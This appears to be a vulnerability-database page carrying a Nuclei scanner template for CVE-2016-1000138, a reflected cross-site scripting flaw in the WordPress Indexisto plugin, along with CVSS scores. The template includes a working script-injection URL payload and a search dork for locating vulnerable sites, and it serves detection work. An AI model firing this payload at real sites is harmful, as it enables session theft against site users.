Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2016-1000138
HistoryJul 20, 2021 - 11:14 p.m.

WordPress Admin Font Editor <=1.8 - Cross-Site Scripting

2021-07-2023:14:21
ProjectDiscovery
github.com
2
cve
2016
wordpress
cross-site scripting
indexisto_project

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

46.3%

WordPress Admin Font Editor plugin indexisto 1.8 and before contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

id: CVE-2016-1000138

info:
  name: WordPress Admin Font Editor <=1.8 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: WordPress Admin Font Editor plugin indexisto 1.8 and before contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    This vulnerability allows an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Update to the latest version of the WordPress Admin Font Editor plugin (1.8 or higher) to fix this vulnerability.
  reference:
    - http://www.vapidlabs.com/wp/wp_advisory.php?v=38
    - https://wordpress.org/plugins/indexisto
    - http://web.archive.org/web/20210622181116/
    - https://nvd.nist.gov/vuln/detail/CVE-2016-1000138
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2016-1000138
    cwe-id: CWE-79
    epss-score: 0.00119
    epss-percentile: 0.46028
    cpe: cpe:2.3:a:indexisto_project:indexisto:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: "indexisto_project"
    product: indexisto
    framework: wordpress
    google-query: "inurl:\"/wp-content/plugins/indexisto\""
  tags: cve,cve2016,wordpress,xss,wp-plugin,indexisto_project
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/indexisto/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - '= Indexisto'

  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100955ffa11eece07af0cfba023405fc6170503ac1e3d623ffc32df2861fe98b9b0022007c37c4deb3d512648bd16c4f7d38bc4be48e053a9d7d122456adf2073abd3b4:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

46.3%

Related for NUCLEI:CVE-2016-1000138